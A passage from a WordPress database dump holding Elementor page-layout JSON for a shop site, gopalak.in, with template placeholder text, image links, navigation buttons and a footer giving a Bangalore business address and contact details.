More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8130,1437,'_elementor_page_assets','a:0:{}'),(8132,1438,'_elementor_edit_mode','builder'),(8133,1438,'_elementor_template_type','wp-page'),(8134,1438,'_elementor_version','3.7.7'),(8135,1438,'_wp_page_template','elementor_canvas'),(8136,1438,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8137,1438,'_elementor_page_assets','a:0:{}'),(8139,1439,'_elementor_edit_mode','builder'),(8140,1439,'_elementor_template_type','wp-page'),(8141,1439,'_elementor_version','3.7.7'),(8142,1439,'_wp_page_template','elementor_canvas'),(8143,1439,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 